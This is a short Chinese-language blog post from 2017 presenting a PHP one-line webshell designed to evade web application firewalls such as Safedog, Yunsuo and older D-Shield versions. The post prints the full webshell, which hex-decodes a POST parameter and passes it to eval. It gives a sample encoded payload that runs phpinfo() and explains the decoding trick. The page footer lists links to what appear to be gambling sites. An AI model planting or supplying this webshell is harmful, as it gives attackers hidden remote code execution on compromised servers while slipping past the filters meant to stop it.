Dec 07 2017

过狗过云锁一句话

首页 » 原创作品 » 过狗过云锁一句话   

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。


今天在群里面看到一些机油讨论一些话题。


看到一个据说是过狗过云锁的一句话。


<?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array("\n","\t","\r"),"",$a);$b="";for($i=0;$i<strlen($a);$i+=2)$b.=urldecode("%".substr($a,$i,2));eval($b);exit;};?>


测试 x=706870696E666F28293B



1.png



这个脚本的意思是

每次取两个

例如第一次 70  加上这个%符号 url 解码 就是p

<?php
echo urldecode("%70");
?>

然后每次拼接 phpinfo():


可以绕过一些post 连接 phpinfo() 关机键的waf 例如低版本d盾



如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «Burp1.7.26 永久版本 | PHP 函数漏洞总结»

你肿么看?

你还可以输入 250/250 个字

微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~

友情链接:guoqibee.com  万达登录  万达主管  万达招商  万达娱乐直属  万达娱乐主管  万达娱乐主管  万达娱乐招商QQ  万达娱乐开户